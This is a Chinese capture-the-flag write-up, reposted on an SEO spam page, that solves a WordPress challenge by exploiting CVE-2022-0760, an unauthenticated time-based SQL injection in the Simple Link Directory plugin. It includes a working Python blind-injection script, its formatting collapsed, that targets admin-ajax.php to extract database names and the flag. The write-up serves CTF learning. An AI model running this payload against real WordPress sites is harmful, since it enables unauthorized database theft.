当前位置: 首页 > news >正文

做淘宝客优惠券网站必须是企业吗网址ip地址查询工具

做淘宝客优惠券网站必须是企业吗,网址ip地址查询工具,wordpress 隐藏相关文章,宁阳网站建设价格CVE-2022-0760 NSS [HNCTF 2022 WEEK2]ohmywordpress 【CVE-2022-0760】 题目描述:flag在数据库里面。 开题: 顺着按钮一直点下去会发现出现一个按钮叫安装WordPress 安装完之后的界面,有一个搜索框。 F12看看network。 又出现了这个Wor…

CVE-2022-0760

NSS [HNCTF 2022 WEEK2]ohmywordpress

【CVE-2022-0760】

题目描述:flag在数据库里面。

开题:

image-20230917120720740

顺着按钮一直点下去会发现出现一个按钮叫安装WordPress

image-20230917120830513

安装完之后的界面,有一个搜索框。

image-20230917120947976

F12看看network。

又出现了这个WordPress,从源码中看出版本是6.0.2

image-20230917121044983

image-20230917123045968

网上一番搜索,找到一个cve,CVE-2022-0760。当WordPress的插件Simple Link Directory版本 < 7.7.2时候存在时间盲注。

查看源码,这里确实运用的这个插件,但是看不到版本。

image-20230917124319477

估计就是这个CVE,那就直接上盲注脚本。

import requests
import timeurl = "http://node5.anna.nssctf.cn:28982/wp-admin/admin-ajax.php"result = ""
for i in range(1, 100):length = len(result)for o in range(32, 128):data = {"action": "qcopd_upvote_action",# "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))={o},sleep(3),0))enz)",# "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=substr((select group_concat(schema_name) from information_schema.schemata),26,11)),{i},1))={o},sleep(3),0))enz)","post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(a) from (select 1 as a union select * from ctftraining.flag)b),{i},1))={o},sleep(3),0))enz)",}time1 = time.time()res = requests.post(url, data=data)time2 = time.time()# print(time2 - time1)# exit()if time2 - time1 > 3:result += chr(o)print(result)breakif len(result) == length:break

image-20230917125858415

为什么这样写脚本,漏洞利用在下面文章里面能找到。

image-20230917125035363

参考文章:

NSFOCUS绿盟科技

[Simple Link Directory < 7.7.2 - Unauthenticated SQL injection WordPress Security Vulnerability (wpscan.com)](

http://www.yidumall.com/news/57213.html

相关文章:

  • c#web网站开发源码爱站网长尾关键词
  • WordPress增加文章来源插件大丰seo排名
  • lol网站怎么做地推团队
  • 全国icp网站备案审核时间如何做关键词优化
  • 做网站后期自己可以维护吗网上接单平台
  • 四川省人民政府官网首页企业seo顾问公司
  • 现在还有企业做网站的吗百度下载安装2021最新版
  • 跨境b2b网站怎么做最近时事新闻热点事件
  • wordpress更换主题方法seo诊断网站
  • 公司做网站 分录谷歌seo代运营
  • 网站附件做外链嘉兴关键词优化报价
  • 网站创建网站seo优化流程
  • 做地方门户网站如何做东莞网络推广托管
  • 阳信网站建设深圳防疫措施优化
  • 高端营销型网站建设小程序开发流程详细
  • wordpress wp contentseo公司系统
  • 山东莱芜疫情最新消息长沙seo搜索
  • 免费建立手机网站关键词搜索引擎又称为
  • 做网站需要许可证吗企业网站注册域名的步骤
  • 企业管理论文官网seo是什么意思
  • 网站不设置关键词描述企业seo排名费用报价
  • 百度能做网站建设吗网站入口
  • 南宁网站建设专家专门代写平台
  • 做网站 免费字体国内最新新闻事件今天
  • 陕西网站建设费用吉林seo外包
  • https网站开发如何配置东莞有哪些做推广的网站
  • 推广公司名字大全如何优化培训体系
  • 网站关键词搜索排名做小程序公司哪家好
  • 黄山建设厅官方网站深圳网站推广公司
  • 建设项目验收在哪个网站公示渠道策略的四种方式